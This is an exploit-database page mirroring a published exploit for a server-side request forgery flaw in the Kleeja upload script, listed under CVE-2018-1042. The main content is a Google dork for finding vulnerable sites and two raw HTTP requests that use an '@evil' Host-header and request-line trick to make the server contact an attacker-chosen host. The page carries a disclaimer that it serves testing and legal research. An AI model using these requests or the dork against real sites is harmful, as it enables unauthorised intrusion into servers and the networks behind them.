Advertisement






Upload Kleeja Server Side Request Forgery (SSRF)

CVE Category Price Severity
CVE-2018-1042 CWE-918 Varies High
Author Risk Exploitation Type Date
Unknown High Remote 2020-09-25
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 0.08457 0.57411

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020090122

Below is a copy:

Upload Kleeja Server Side Request Forgery (SSRF)
# Exploit Title: Server Side Request Forgery (SSRF) in Upload Kleeja
# Google Dork: Powered by Kleeja
# Date: 21 - 07 - 2020
# Exploit Author: Saud
# Software Link: https://github.com/kleeja-official
# Version: All
# Homepage: http://kleeja.net/
# Tested on: Version 2.4
# CVE : CVE-2018-1042

evil = For Example SSRF

Example exploitation request:
-----------------------------------------------------------------------
GET /up/go.php?go=stats HTTP/1.1
Host: saud.com:80@evil
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
-----------------------------------------------------------------------

or

-----------------------------------------------------------------------

GET @evil/ HTTP/1.1
Host: saud.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close





### [ Contacts: ]
[#] Telegram: @x0Saudi
[#] Twitter: @Dmaral3noz

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum